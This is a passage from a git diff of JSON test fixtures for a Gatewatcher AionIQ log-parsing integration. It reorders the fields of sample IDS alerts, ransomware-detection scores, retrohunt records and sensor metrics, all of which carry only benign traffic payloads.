\"mac\": \"00:50:56:91:73:14\"\n },\n \"destination\": {\n \"ip\": \"13.107.4.52\",\n \"port\": 80,\n \"mac\": \"00:08:e3:ff:fc:28\"\n },\n \"nba\": {\n \"packet\": \"AAjj//woAFBWkXMUCABFAAAo6pNAAEAGLaIKAgb6DWsENMbGAFBecku30OsVlVAQAfUzhAAAAAAAAAAA\",\n \"payload\": \"R0VUIC9jb25uZWN0dGVzdC50eHQgSFRUUC8xLjENClByYWdtYTogbm8tY2FjaGUNClVzZXItQWdlbnQ6IE1pY3Jvc29mdCBOQ1NJDQpIb3N0OiB3d3cubXNmdGNvbm5lY3R0ZXN0LmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0K\",\n \"payload_printable\": \"GET /connecttest.txt HTTP/1.1\\r\\nPragma: no-cache\\r\\nUser-Agent: Microsoft NCSI\\r\\nHost: www.msftconnecttest.com\\r\\nCache-Control: no-cache\\r\\nConnection: keep-alive\\r\\n\\r\\n\",\n \"signature_id\": 2031071,\n \"gid\": 1,\n \"category\": \"Network Behavior Analytics\",\n \"action\": \"allowed\",\n \"signature\": \"NBA C&C tracker : cobalt strike tcp initialization\",\n \"metadata\": {\n \"performance_impact\": [\n \"High\"\n ],\n \"signature_severity\": [\n \"CRITICAL\"\n ]\n },\n \"rev\": 1,\n \"stream\": 1\n },\n \"http\": {\n \"url\": \"/connecttest.txt\",\n \"http_user_agent\": \"Microsoft NCSI\",\n \"version\": \"HTTP/1.1\",\n \"hostname\": \"www.msftconnecttest.com\",\n \"request\": {\n \"method\": \"GET\"\n },\n \"response\": {\n \"bytes\": 22,\n \"status_code\": 200,\n \"mime_type\": \"text/plain\"\n }\n },\n \"url\": {\n \"domain\": \"www.msftconnecttest.com\",\n \"path\": \"/connecttest.txt\"\n },\n \"user_agent\": {\n \"original\": \"Microsoft NCSI\"\n },\n \"packet_info\": {\n \"linktype\": 1\n },\n \"flow\": {\n \"bytes_toclient\": 700,\n \"pkts_toclient\": 3,\n \"bytes_toserver\": 407,\n \"pkts_toserver\": 4,\n \"start\": \"2022-09-01T16:06:15.602042+0000\"\n },\n \"@version\": \"1\",\n \"@timestamp\": \"2022-09-01T16:06:51.664Z\"\n}" + } }, "expected": { "message": "{\n \"observer\": {\n \"hostname\": \"gcenter-interne-rd-56.gatewatcher.com\",\n \"product\": \"gcenter\",\n \"version\": \"2.5.3.103\",\n \"vendor\": \"gatewatcher\",\n 
\"gcap\": {\n \"hostname\": \"gcap-interne-rd-55.gatewatcher.com\",\n \"version\": \"2.5.3.107\",\n \"ingress\": {\n \"interface\": {\n \"name\": \"mon0\"\n }\n }\n },\n \"log_format_version\": \"1.0.0\"\n },\n \"event\": {\n \"kind\": \"alert\",\n \"dataset\": \"alert\",\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"module\": \"network_behavior_analytics\",\n \"created\": \"2022-09-01T16:06:15.605Z\",\n \"id\": \"730a47f1-f7b1-4faa-9d61-8a41d7b138ed\",\n \"severity\": 2\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"network\": {\n \"transport\": \"tcp\",\n \"protocol\": \"http\",\n \"flow_id\": 2071994639527866,\n \"community_id\": \"1:Q22WBDRnlyCXH/Y/pcypXCr+nJc=\",\n \"timestamp\": \"2022-09-01T16:06:15.605Z\",\n \"tx_id\": 0\n },\n \"source\": {\n \"ip\": \"10.2.6.250\",\n \"port\": 50886,\n \"mac\": \"00:50:56:91:73:14\"\n },\n \"destination\": {\n \"ip\": \"13.107.4.52\",\n \"port\": 80,\n \"mac\": \"00:08:e3:ff:fc:28\"\n },\n \"nba\": {\n \"packet\": \"AAjj//woAFBWkXMUCABFAAAo6pNAAEAGLaIKAgb6DWsENMbGAFBecku30OsVlVAQAfUzhAAAAAAAAAAA\",\n \"payload\": \"R0VUIC9jb25uZWN0dGVzdC50eHQgSFRUUC8xLjENClByYWdtYTogbm8tY2FjaGUNClVzZXItQWdlbnQ6IE1pY3Jvc29mdCBOQ1NJDQpIb3N0OiB3d3cubXNmdGNvbm5lY3R0ZXN0LmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0K\",\n \"payload_printable\": \"GET /connecttest.txt HTTP/1.1\\r\\nPragma: no-cache\\r\\nUser-Agent: Microsoft NCSI\\r\\nHost: www.msftconnecttest.com\\r\\nCache-Control: no-cache\\r\\nConnection: keep-alive\\r\\n\\r\\n\",\n \"signature_id\": 2031071,\n \"gid\": 1,\n \"category\": \"Network Behavior Analytics\",\n \"action\": \"allowed\",\n \"signature\": \"NBA C&C tracker : cobalt strike tcp initialization\",\n \"metadata\": {\n \"performance_impact\": [\n \"High\"\n ],\n \"signature_severity\": [\n \"CRITICAL\"\n ]\n },\n \"rev\": 1,\n \"stream\": 1\n },\n \"http\": {\n \"url\": \"/connecttest.txt\",\n \"http_user_agent\": \"Microsoft NCSI\",\n \"version\": \"HTTP/1.1\",\n 
\"hostname\": \"www.msftconnecttest.com\",\n \"request\": {\n \"method\": \"GET\"\n },\n \"response\": {\n \"bytes\": 22,\n \"status_code\": 200,\n \"mime_type\": \"text/plain\"\n }\n },\n \"url\": {\n \"domain\": \"www.msftconnecttest.com\",\n \"path\": \"/connecttest.txt\"\n },\n \"user_agent\": {\n \"original\": \"Microsoft NCSI\"\n },\n \"packet_info\": {\n \"linktype\": 1\n },\n \"flow\": {\n \"bytes_toclient\": 700,\n \"pkts_toclient\": 3,\n \"bytes_toserver\": 407,\n \"pkts_toserver\": 4,\n \"start\": \"2022-09-01T16:06:15.602042+0000\"\n },\n \"@version\": \"1\",\n \"@timestamp\": \"2022-09-01T16:06:51.664Z\"\n}", diff --git a/GateWatcher/aioniq_ecs/tests/ransomware.json b/GateWatcher/aioniq_ecs/tests/ransomware.json index 38d350641..cfac8fd46 100644 --- a/GateWatcher/aioniq_ecs/tests/ransomware.json +++ b/GateWatcher/aioniq_ecs/tests/ransomware.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\n \"source\": {\n \"ip\": \"172.31.47.105\",\n \"port\": 50066\n },\n \"event\": {\n \"created\": \"2024-09-13T09:11:20.223813+00:00\",\n \"dataset\": \"alert\",\n \"end\": \"2024-09-13T09:09:11.988000\",\n \"module\": \"ransomware_detect\",\n \"kind\": \"alert\",\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"start\": \"2024-09-13T09:08:51.988000\",\n \"id\": \"f357f7d1-e322-4f67-b798-50d05f54204b\",\n \"severity\": 1\n },\n \"observer\": {\n \"product\": \"gcenter\",\n \"log_format_version\": \"1.0.0\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"vendor\": \"gatewatcher\",\n \"gcap\": {\n \"ingress\": {\n \"interface\": {\n \"name\": \"monvirt\"\n }\n },\n \"version\": \"2.5.4.0-rc1\",\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\"\n },\n \"version\": \"2.5.3.103\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\"\n },\n \"destination\": {\n \"ip\": \"172.31.33.0\",\n \"port\": 445\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"ransomware\": {\n \"alert_threshold\": 648,\n \"malicious_behavior_confidence\": 80,\n \"session_score\": 37\n },\n \"@timestamp\": \"2024-09-13T09:11:39.629080222Z\",\n \"smb\": {\n \"session_id\": 593737889611873\n },\n \"network\": {\n \"protocol\": \"smb\",\n \"flow_id\": 1465670492342121,\n \"transport\": \"tcp\",\n \"timestamp\": \"2024-09-13T09:08:44.877000+00:00\",\n \"community_id\": \"1:RA5iYDlaiu3WMutFLj5r//rbk34=\"\n },\n \"@version\": \"1\"\n}", "sekoiaio": { "intake": { "dialect": "Gatewatcher AionIQ V103", "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680" } - }, - "message": "{\n \"source\": {\n \"ip\": \"172.31.47.105\",\n \"port\": 50066\n },\n \"event\": {\n \"created\": \"2024-09-13T09:11:20.223813+00:00\",\n \"dataset\": \"alert\",\n \"end\": \"2024-09-13T09:09:11.988000\",\n \"module\": \"ransomware_detect\",\n \"kind\": \"alert\",\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"start\": 
\"2024-09-13T09:08:51.988000\",\n \"id\": \"f357f7d1-e322-4f67-b798-50d05f54204b\",\n \"severity\": 1\n },\n \"observer\": {\n \"product\": \"gcenter\",\n \"log_format_version\": \"1.0.0\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"vendor\": \"gatewatcher\",\n \"gcap\": {\n \"ingress\": {\n \"interface\": {\n \"name\": \"monvirt\"\n }\n },\n \"version\": \"2.5.4.0-rc1\",\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\"\n },\n \"version\": \"2.5.3.103\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\"\n },\n \"destination\": {\n \"ip\": \"172.31.33.0\",\n \"port\": 445\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"ransomware\": {\n \"alert_threshold\": 648,\n \"malicious_behavior_confidence\": 80,\n \"session_score\": 37\n },\n \"@timestamp\": \"2024-09-13T09:11:39.629080222Z\",\n \"smb\": {\n \"session_id\": 593737889611873\n },\n \"network\": {\n \"protocol\": \"smb\",\n \"flow_id\": 1465670492342121,\n \"transport\": \"tcp\",\n \"timestamp\": \"2024-09-13T09:08:44.877000+00:00\",\n \"community_id\": \"1:RA5iYDlaiu3WMutFLj5r//rbk34=\"\n },\n \"@version\": \"1\"\n}" + } }, "expected": { "message": "{\n \"source\": {\n \"ip\": \"172.31.47.105\",\n \"port\": 50066\n },\n \"event\": {\n \"created\": \"2024-09-13T09:11:20.223813+00:00\",\n \"dataset\": \"alert\",\n \"end\": \"2024-09-13T09:09:11.988000\",\n \"module\": \"ransomware_detect\",\n \"kind\": \"alert\",\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"start\": \"2024-09-13T09:08:51.988000\",\n \"id\": \"f357f7d1-e322-4f67-b798-50d05f54204b\",\n \"severity\": 1\n },\n \"observer\": {\n \"product\": \"gcenter\",\n \"log_format_version\": \"1.0.0\",\n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n \"vendor\": \"gatewatcher\",\n \"gcap\": {\n \"ingress\": {\n \"interface\": {\n \"name\": \"monvirt\"\n }\n },\n \"version\": \"2.5.4.0-rc1\",\n \"hostname\": \"gcap-clement-l.gatewatcher.fr\"\n },\n \"version\": \"2.5.3.103\",\n \"hostname\": 
\"gcenter-clelyo-01.gatewatcher.com\"\n },\n \"destination\": {\n \"ip\": \"172.31.33.0\",\n \"port\": 445\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"ransomware\": {\n \"alert_threshold\": 648,\n \"malicious_behavior_confidence\": 80,\n \"session_score\": 37\n },\n \"@timestamp\": \"2024-09-13T09:11:39.629080222Z\",\n \"smb\": {\n \"session_id\": 593737889611873\n },\n \"network\": {\n \"protocol\": \"smb\",\n \"flow_id\": 1465670492342121,\n \"transport\": \"tcp\",\n \"timestamp\": \"2024-09-13T09:08:44.877000+00:00\",\n \"community_id\": \"1:RA5iYDlaiu3WMutFLj5r//rbk34=\"\n },\n \"@version\": \"1\"\n}", diff --git a/GateWatcher/aioniq_ecs/tests/retrohunt.json b/GateWatcher/aioniq_ecs/tests/retrohunt.json index 2ac0df9b6..543d85db7 100644 --- a/GateWatcher/aioniq_ecs/tests/retrohunt.json +++ b/GateWatcher/aioniq_ecs/tests/retrohunt.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\n \"observer\": {\n \"id\": \"\"\n },\n \"event\": {\n \"kind\": \"alert\",\n \"dataset\": \"alert\",\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"module\": \"retrohunt\",\n \"created\": \"2022-12-14T09:51:30.455Z\",\n \"id\": \"8223b432-7e97-4570-a29d-254f41dbb9db\",\n \"severity\": 2\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"network\": {\n \"ether\": \"\"\n },\n \"source\": {\n \"ip\": \"127.0.0.1\",\n \"port\": \"80\"\n },\n \"destination\": {\n \"ip\": \"127.0.0.1\",\n \"port\": \"8080\"\n },\n \"matched_event\": {\n \"id\": \"1\"\n },\n \"ioc\": {\n \"id\": \"1\"\n },\n \"@timestamp\": \"2022-09-01T12:49:07.749Z\"\n}", "sekoiaio": { "intake": { "dialect": "Gatewatcher AionIQ V103", "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680" } - }, - "message": "{\n \"observer\": {\n \"id\": \"\"\n },\n \"event\": {\n \"kind\": \"alert\",\n \"dataset\": \"alert\",\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"module\": \"retrohunt\",\n \"created\": \"2022-12-14T09:51:30.455Z\",\n \"id\": \"8223b432-7e97-4570-a29d-254f41dbb9db\",\n \"severity\": 2\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"network\": {\n \"ether\": \"\"\n },\n \"source\": {\n \"ip\": \"127.0.0.1\",\n \"port\": \"80\"\n },\n \"destination\": {\n \"ip\": \"127.0.0.1\",\n \"port\": \"8080\"\n },\n \"matched_event\": {\n \"id\": \"1\"\n },\n \"ioc\": {\n \"id\": \"1\"\n },\n \"@timestamp\": \"2022-09-01T12:49:07.749Z\"\n}" + } }, "expected": { "message": "{\n \"observer\": {\n \"id\": \"\"\n },\n \"event\": {\n \"kind\": \"alert\",\n \"dataset\": \"alert\",\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"module\": \"retrohunt\",\n \"created\": \"2022-12-14T09:51:30.455Z\",\n \"id\": \"8223b432-7e97-4570-a29d-254f41dbb9db\",\n \"severity\": 2\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"network\": {\n \"ether\": \"\"\n },\n \"source\": {\n \"ip\": \"127.0.0.1\",\n 
\"port\": \"80\"\n },\n \"destination\": {\n \"ip\": \"127.0.0.1\",\n \"port\": \"8080\"\n },\n \"matched_event\": {\n \"id\": \"1\"\n },\n \"ioc\": {\n \"id\": \"1\"\n },\n \"@timestamp\": \"2022-09-01T12:49:07.749Z\"\n}", diff --git a/GateWatcher/aioniq_ecs/tests/sigflow_alert.json b/GateWatcher/aioniq_ecs/tests/sigflow_alert.json index 2994c798a..1bcd1b452 100644 --- a/GateWatcher/aioniq_ecs/tests/sigflow_alert.json +++ b/GateWatcher/aioniq_ecs/tests/sigflow_alert.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{ \n \"observer\": { \n \"vendor\": \"gatewatcher\", \n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\", \n \"gcap\": { \n \"ingress\": { \n \"interface\": { \n \"name\": \"monvirt\" \n } \n }, \n \"hostname\": \"gcap-clement-l.gatewatcher.fr\", \n \"version\": \"2.5.4.0-rc1\" \n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"source\": {\n \"mac\": \"00:6f:37:76:51:45\",\n \"port\": 62832,\n \"ip\": \"65.100.113.120\"\n },\n \"metadata\": {\n \"flowbits\": [\n \"http.dottedquadhost.pdf\"\n ]\n },\n \"@timestamp\": \"2024-09-11T13:55:34.006Z\",\n \"@version\": \"1\",\n \"network\": {\n \"protocol\": \"http\",\n \"community_id\": \"1:8T6+TppVoaMkXwi+BTjnzAYozVc=\",\n \"timestamp\": \"2024-09-11T13:55:01.080901+0000\",\n \"transport\": \"tcp\",\n \"tx_id\": 0,\n \"flow_id\": 1331841998337663\n },\n \"destination\": {\n \"mac\": \"00:43:70:57:75:55\",\n \"port\": 80,\n \"ip\": \"56.53.117.115\"\n },\n \"flow\": {\n \"bytes_toclient\": 1362,\n \"bytes_toserver\": 358,\n \"pkts_toclient\": 3,\n \"start\": \"2024-09-11T13:55:01.079487+0000\",\n \"pkts_toserver\": 4\n },\n \"url\": {\n \"domain\": \"56.53.117.115\",\n \"path\": \"/malcore_10KB_clean.pdf\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"http\": {\n \"request\": {\n \"method\": \"GET\"\n },\n \"hostname\": \"56.53.117.115\",\n \"version\": \"HTTP/1.1\",\n \"response\": {\n \"status\": 200,\n \"mime_type\": \"application/pdf\",\n \"bytes\": 1135\n }\n },\n \"sigflow\": {\n \"action\": \"allowed\",\n \"metadata\": {\n \"signature_severity\": [\n \"Informational\"\n ],\n \"attack_target\": [\n \"Client_Endpoint\"\n ],\n \"created_at\": [\n \"2019_04_23\"\n ],\n \"deployment\": [\n \"Perimeter\"\n ],\n \"performance_impact\": [\n \"Significant\"\n ],\n \"updated_at\": [\n \"2022_11_21\"\n ]\n },\n \"signature\": \"ET INFO Dotted Quad Host PDF 
Request\",\n \"payload_printable\": \"GET /malcore_10KB_clean.pdf HTTP/1.1\\r\\nHost: 56.53.117.115\\r\\nAccept-Encoding: gzip,compress,deflate\\r\\nKeep-Alive: 300\\r\\nConnection: keep-alive\\r\\n\\r\\n\",\n \"packet\": \"AENwV3VVAG83dlFFCABFAAAoAAEAAEAGGktBZHF4ODV1c/VwAFAa9wCtFhR7nlAQIACMOAAA\",\n \"stream\": 1,\n \"signature_id\": 2027265,\n \"rev\": 4,\n \"category\": \"Potentially Bad Traffic\",\n \"gid\": 1,\n \"packet_info\": {\n \"linktype\": 1\n },\n \"payload\": \"R0VUIC9tYWxjb3JlXzEwS0JfY2xlYW4ucGRmIEhUVFAvMS4xDQpIb3N0OiA1Ni41My4xMTcuMTE1DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsY29tcHJlc3MsZGVmbGF0ZQ0KS2VlcC1BbGl2ZTogMzAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg==\"\n },\n \"event\": {\n \"dataset\": \"alert\",\n \"kind\": \"alert\",\n \"module\": \"sigflow_alert\",\n \"severity\": 2,\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"id\": \"58c28570-6c90-4ba9-b9b5-f72867d5fa08\",\n \"created\": \"2024-09-11T13:55:01.080901+0000\"\n }\n}", "sekoiaio": { "intake": { "dialect": "Gatewatcher AionIQ V103", "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680" } - }, - "message": "{ \n \"observer\": { \n \"vendor\": \"gatewatcher\", \n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\", \n \"gcap\": { \n \"ingress\": { \n \"interface\": { \n \"name\": \"monvirt\" \n } \n }, \n \"hostname\": \"gcap-clement-l.gatewatcher.fr\", \n \"version\": \"2.5.4.0-rc1\" \n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"source\": {\n \"mac\": \"00:6f:37:76:51:45\",\n \"port\": 62832,\n \"ip\": \"65.100.113.120\"\n },\n \"metadata\": {\n \"flowbits\": [\n \"http.dottedquadhost.pdf\"\n ]\n },\n \"@timestamp\": \"2024-09-11T13:55:34.006Z\",\n \"@version\": \"1\",\n \"network\": {\n \"protocol\": \"http\",\n \"community_id\": \"1:8T6+TppVoaMkXwi+BTjnzAYozVc=\",\n \"timestamp\": \"2024-09-11T13:55:01.080901+0000\",\n \"transport\": \"tcp\",\n \"tx_id\": 0,\n 
\"flow_id\": 1331841998337663\n },\n \"destination\": {\n \"mac\": \"00:43:70:57:75:55\",\n \"port\": 80,\n \"ip\": \"56.53.117.115\"\n },\n \"flow\": {\n \"bytes_toclient\": 1362,\n \"bytes_toserver\": 358,\n \"pkts_toclient\": 3,\n \"start\": \"2024-09-11T13:55:01.079487+0000\",\n \"pkts_toserver\": 4\n },\n \"url\": {\n \"domain\": \"56.53.117.115\",\n \"path\": \"/malcore_10KB_clean.pdf\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"http\": {\n \"request\": {\n \"method\": \"GET\"\n },\n \"hostname\": \"56.53.117.115\",\n \"version\": \"HTTP/1.1\",\n \"response\": {\n \"status\": 200,\n \"mime_type\": \"application/pdf\",\n \"bytes\": 1135\n }\n },\n \"sigflow\": {\n \"action\": \"allowed\",\n \"metadata\": {\n \"signature_severity\": [\n \"Informational\"\n ],\n \"attack_target\": [\n \"Client_Endpoint\"\n ],\n \"created_at\": [\n \"2019_04_23\"\n ],\n \"deployment\": [\n \"Perimeter\"\n ],\n \"performance_impact\": [\n \"Significant\"\n ],\n \"updated_at\": [\n \"2022_11_21\"\n ]\n },\n \"signature\": \"ET INFO Dotted Quad Host PDF Request\",\n \"payload_printable\": \"GET /malcore_10KB_clean.pdf HTTP/1.1\\r\\nHost: 56.53.117.115\\r\\nAccept-Encoding: gzip,compress,deflate\\r\\nKeep-Alive: 300\\r\\nConnection: keep-alive\\r\\n\\r\\n\",\n \"packet\": \"AENwV3VVAG83dlFFCABFAAAoAAEAAEAGGktBZHF4ODV1c/VwAFAa9wCtFhR7nlAQIACMOAAA\",\n \"stream\": 1,\n \"signature_id\": 2027265,\n \"rev\": 4,\n \"category\": \"Potentially Bad Traffic\",\n \"gid\": 1,\n \"packet_info\": {\n \"linktype\": 1\n },\n \"payload\": \"R0VUIC9tYWxjb3JlXzEwS0JfY2xlYW4ucGRmIEhUVFAvMS4xDQpIb3N0OiA1Ni41My4xMTcuMTE1DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsY29tcHJlc3MsZGVmbGF0ZQ0KS2VlcC1BbGl2ZTogMzAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg==\"\n },\n \"event\": {\n \"dataset\": \"alert\",\n \"kind\": \"alert\",\n \"module\": \"sigflow_alert\",\n \"severity\": 2,\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"id\": \"58c28570-6c90-4ba9-b9b5-f72867d5fa08\",\n \"created\": 
\"2024-09-11T13:55:01.080901+0000\"\n }\n}" + } }, "expected": { "message": "{ \n \"observer\": { \n \"vendor\": \"gatewatcher\", \n \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\", \n \"gcap\": { \n \"ingress\": { \n \"interface\": { \n \"name\": \"monvirt\" \n } \n }, \n \"hostname\": \"gcap-clement-l.gatewatcher.fr\", \n \"version\": \"2.5.4.0-rc1\" \n },\n \"version\": \"2.5.3.103\",\n \"log_format_version\": \"1.0.0\",\n \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n \"product\": \"gcenter\"\n },\n \"source\": {\n \"mac\": \"00:6f:37:76:51:45\",\n \"port\": 62832,\n \"ip\": \"65.100.113.120\"\n },\n \"metadata\": {\n \"flowbits\": [\n \"http.dottedquadhost.pdf\"\n ]\n },\n \"@timestamp\": \"2024-09-11T13:55:34.006Z\",\n \"@version\": \"1\",\n \"network\": {\n \"protocol\": \"http\",\n \"community_id\": \"1:8T6+TppVoaMkXwi+BTjnzAYozVc=\",\n \"timestamp\": \"2024-09-11T13:55:01.080901+0000\",\n \"transport\": \"tcp\",\n \"tx_id\": 0,\n \"flow_id\": 1331841998337663\n },\n \"destination\": {\n \"mac\": \"00:43:70:57:75:55\",\n \"port\": 80,\n \"ip\": \"56.53.117.115\"\n },\n \"flow\": {\n \"bytes_toclient\": 1362,\n \"bytes_toserver\": 358,\n \"pkts_toclient\": 3,\n \"start\": \"2024-09-11T13:55:01.079487+0000\",\n \"pkts_toserver\": 4\n },\n \"url\": {\n \"domain\": \"56.53.117.115\",\n \"path\": \"/malcore_10KB_clean.pdf\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"http\": {\n \"request\": {\n \"method\": \"GET\"\n },\n \"hostname\": \"56.53.117.115\",\n \"version\": \"HTTP/1.1\",\n \"response\": {\n \"status\": 200,\n \"mime_type\": \"application/pdf\",\n \"bytes\": 1135\n }\n },\n \"sigflow\": {\n \"action\": \"allowed\",\n \"metadata\": {\n \"signature_severity\": [\n \"Informational\"\n ],\n \"attack_target\": [\n \"Client_Endpoint\"\n ],\n \"created_at\": [\n \"2019_04_23\"\n ],\n \"deployment\": [\n \"Perimeter\"\n ],\n \"performance_impact\": [\n \"Significant\"\n ],\n \"updated_at\": [\n \"2022_11_21\"\n ]\n },\n \"signature\": \"ET 
INFO Dotted Quad Host PDF Request\",\n \"payload_printable\": \"GET /malcore_10KB_clean.pdf HTTP/1.1\\r\\nHost: 56.53.117.115\\r\\nAccept-Encoding: gzip,compress,deflate\\r\\nKeep-Alive: 300\\r\\nConnection: keep-alive\\r\\n\\r\\n\",\n \"packet\": \"AENwV3VVAG83dlFFCABFAAAoAAEAAEAGGktBZHF4ODV1c/VwAFAa9wCtFhR7nlAQIACMOAAA\",\n \"stream\": 1,\n \"signature_id\": 2027265,\n \"rev\": 4,\n \"category\": \"Potentially Bad Traffic\",\n \"gid\": 1,\n \"packet_info\": {\n \"linktype\": 1\n },\n \"payload\": \"R0VUIC9tYWxjb3JlXzEwS0JfY2xlYW4ucGRmIEhUVFAvMS4xDQpIb3N0OiA1Ni41My4xMTcuMTE1DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsY29tcHJlc3MsZGVmbGF0ZQ0KS2VlcC1BbGl2ZTogMzAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg==\"\n },\n \"event\": {\n \"dataset\": \"alert\",\n \"kind\": \"alert\",\n \"module\": \"sigflow_alert\",\n \"severity\": 2,\n \"category\": [\n \"network\",\n \"intrusion_detection\"\n ],\n \"id\": \"58c28570-6c90-4ba9-b9b5-f72867d5fa08\",\n \"created\": \"2024-09-11T13:55:01.080901+0000\"\n }\n}", diff --git a/GateWatcher/aioniq_ecs/tests/sigflow_stats.json b/GateWatcher/aioniq_ecs/tests/sigflow_stats.json index f6c5e07ee..f94495cd2 100644 --- a/GateWatcher/aioniq_ecs/tests/sigflow_stats.json +++ b/GateWatcher/aioniq_ecs/tests/sigflow_stats.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\n \"observer\": {\n \"hostname\": \"gcenter-interne-rd-56.gatewatcher.com\",\n \"product\": \"gcenter\",\n \"version\": \"2.5.3.103\",\n \"vendor\": \"gatewatcher\",\n \"gcap\": {\n \"hostname\": \"gcap-interne-rd-55.gatewatcher.com\",\n \"version\": \"2.5.3.107\"\n },\n \"log_format_version\": \"1.0.0\"\n },\n \"event\": {\n \"kind\": \"metric\",\n \"dataset\": \"system_metrics\",\n \"category\": [\n \"host\"\n ],\n \"module\": \"sigflow_stats\",\n \"created\": \"2022-12-14T09:51:30.455Z\",\n \"id\": \"f14ab432-7e97-4570-a29d-254f41dbb9db\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"stats\": {\n \"app_layer\": {},\n \"tcp\": {},\n \"uptime\": 443637,\n \"ftp\": {},\n \"flow_bypassed\": {},\n \"decoder\": {},\n \"detect\": {},\n \"defrag\": {},\n \"flow\": {},\n \"capture\": {},\n \"http\": {},\n \"file_store\": {}\n },\n \"@version\": \"1\",\n \"@timestamp\": \"2022-09-01T10:49:46.643Z\"\n}", "sekoiaio": { "intake": { "dialect": "Gatewatcher AionIQ V103", "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680" } - }, - "message": "{\n \"observer\": {\n \"hostname\": \"gcenter-interne-rd-56.gatewatcher.com\",\n \"product\": \"gcenter\",\n \"version\": \"2.5.3.103\",\n \"vendor\": \"gatewatcher\",\n \"gcap\": {\n \"hostname\": \"gcap-interne-rd-55.gatewatcher.com\",\n \"version\": \"2.5.3.107\"\n },\n \"log_format_version\": \"1.0.0\"\n },\n \"event\": {\n \"kind\": \"metric\",\n \"dataset\": \"system_metrics\",\n \"category\": [\n \"host\"\n ],\n \"module\": \"sigflow_stats\",\n \"created\": \"2022-12-14T09:51:30.455Z\",\n \"id\": \"f14ab432-7e97-4570-a29d-254f41dbb9db\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"stats\": {\n \"app_layer\": {},\n \"tcp\": {},\n \"uptime\": 443637,\n \"ftp\": {},\n \"flow_bypassed\": {},\n \"decoder\": {},\n \"detect\": {},\n \"defrag\": {},\n \"flow\": {},\n \"capture\": {},\n \"http\": {},\n \"file_store\": {}\n },\n \"@version\": \"1\",\n \"@timestamp\": 
\"2022-09-01T10:49:46.643Z\"\n}" + } }, "expected": { "message": "{\n \"observer\": {\n \"hostname\": \"gcenter-interne-rd-56.gatewatcher.com\",\n \"product\": \"gcenter\",\n \"version\": \"2.5.3.103\",\n \"vendor\": \"gatewatcher\",\n \"gcap\": {\n \"hostname\": \"gcap-interne-rd-55.gatewatcher.com\",\n \"version\": \"2.5.3.107\"\n },\n \"log_format_version\": \"1.0.0\"\n },\n \"event\": {\n \"kind\": \"metric\",\n \"dataset\": \"system_metrics\",\n \"category\": [\n \"host\"\n ],\n \"module\": \"sigflow_stats\",\n \"created\": \"2022-12-14T09:51:30.455Z\",\n \"id\": \"f14ab432-7e97-4570-a29d-254f41dbb9db\"\n },\n \"ecs\": {\n \"version\": \"8.6.0\"\n },\n \"stats\": {\n \"app_layer\": {},\n \"tcp\": {},\n \"uptime\": 443637,\n \"ftp\": {},\n \"flow_bypassed\": {},\n \"decoder\": {},\n \"detect\": {},\n \"defrag\": {},\n \"flow\": {},\n \"capture\": {},\n \"http\": {},\n \"file_store\": {}\n },\n \"@version\": \"1\",\n \"@timestamp\": 